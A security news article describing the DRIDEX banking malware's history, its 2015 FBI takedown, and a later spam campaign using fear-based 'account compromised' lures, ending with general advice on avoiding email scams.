If there's one thing that you can count on coming back, it's DRIDEX.
This piece of malicious code has a history of being particularly resilient. Over the past couple of years, it has surfaced and begun to make a name for itself as the successor to the Gameover Zeus malware, according to Trend Micro. DRIDEX, a banking malware that leverages programs within Microsoft Office to infect financial systems, is unique because it operates under a Botnet-as-a-Service business model, using multiple servers to create several bot networks that list target banks.
Higher powers-that-be are even getting into the fray with DRIDEX. In October, Trend Micro reported that the FBI had partnered with various security vendors to orchestrate a takedown of the malware and its perpetrators, leading to the seizure of multiple servers being used by DRIDEX to infiltrate systems and steal information.
So far, the malware has been the culprit of successful attacks against banking institutions. CNBC reported that Andrey Ghinkul, a 30-year-old hacker from Moldova, was arrested by the FBI in October in connection with a total of $30.7 million stolen using this malicious program. This is how extensively DRIDEX has been able to impact companies on a global scale – so much so that the FBI and the U.K.'s National Crime Agency have been called in to eradicate it.
DRIDEX is back at it again
Despite the dramatic takedown of the malware and subsequent charges filed against its administrators, it seems that what is dead may never actually die. Over the past few months since the FBI takedown, the malware has been mildly silent. But recently, Trend Micro researchers reported that DRIDEX has exhibited a spike in spam email activity in the U.S., Brazil, China, Germany and Japan. The U.S. was the victim of most of these email attacks, at nearly 60 percent.
Usually, these kinds of spam emails include fake invoices requesting that users divulge banking information. It seems that this time around, the perpetrators of DRIDEX have a different strategy up their sleeves.
"There are significant differences from this particular DRIDEX campaign as opposed to its previous waves," Trend Micro researchers wrote. "Instead of the usual fake invoice or notification baits, DRIDEX plays on people's fears of having their accounts compromised."
The emails usually carry language that would strike fear in the hearts of those targeted, with subject lines like "Account Compromised." This kind of attack, which works on certain kinds of people better than others, attempts to get users to open the email and click on any link by using fear tactics. Even worse, now it's able to use the command-line program Certutil, which allows DRIDEX to pass itself off as a legitimate certificate. In other words, to unwary eyes, the email will look real.
The program, therefore, is banking on you opening the email attachments, which supposedly include the full report about how your account information has been accessed. This, of course, is the beginning of the malware's infiltration.
Look out for more DRIDEX in the future
This isn't the only recent resurgence of the DRIDEX malware. At the beginning of April 2016, Dark Reading contributor Jai Vijayan reported that it was being used to steal payment card data by different actors than it had been in the past.
"The manner in which DRIDEX is currently being used also is consistent with the manner in which other major cyber groups have evolved their strategies," Vijayan wrote, paraphrasing buguroo CTO and co-founder Pablo de la Riva Ferrezuelo. "After initially using the malware themselves, such groups have tended to sell it for use to other groups and eventually the code leaks to the broader underground community."
What does this mean? There's no shortage of hackers looking to exploit your banking information for their own nefarious purposes, and if the code for DRIDEX is still lurking, you can bet these malicious actors will be using it – no matter whether men like Ghinkul are behind bars or not.
How to combat banking malware
Utilizing malicious code to infiltrate and steal banking data is one of the most popular ways for hackers to gain access to confidential financial information, as the use of the DRIDEX malware demonstrates. Banking malware has been used in the past to steal millions of dollars from financial services organizations.
When old strains of malware become a new threat, it's crucial to make sure your computer systems are protected. In addition, it's best practice to avoid clicking on links in emails that come from unknown entities. To keep systems safe, cyber security products that track credibility of web domains are going to be the most useful, along with file reputation checking. The bottom line is: Don't be fooled by DRIDEX email scams, and invest in cyber security solutions that can minimize the impact of these targeted attacks.
